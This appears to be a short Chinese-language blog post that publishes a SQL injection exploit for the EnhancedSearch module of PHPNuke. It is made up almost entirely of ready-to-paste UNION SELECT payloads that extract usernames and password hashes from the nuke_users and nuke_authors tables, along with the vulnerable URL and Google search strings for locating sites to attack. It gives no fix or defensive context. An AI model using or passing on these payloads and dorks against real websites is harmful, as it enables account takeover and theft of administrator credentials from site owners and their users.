[Exploit]PHPNuke 所有版本 EnhancedSearch 文件存在主入漏洞

[Exploit]PHPNuke 所有版本 EnhancedSearch 文件存在主入漏洞  
 
 
SQL Injection :

EnhancedSearch%’) UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

EnhancedSearch%’) UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*

EnhancedSearch%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

——————————————-

http://www.victim.com/path/modules.php?name=EnhancedSearch

Search :

EnhancedSearch%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

——————————————-

google:

“Enhanced Search Version 2.0: Powered by”

inurl:”modules.php?name=EnhancedSearch”

没有评论:

发表评论

Follow Us

FOLLOW US

Blog Archive

Comments

Blogger 提供支持.

Search This Blog

Tags

header ads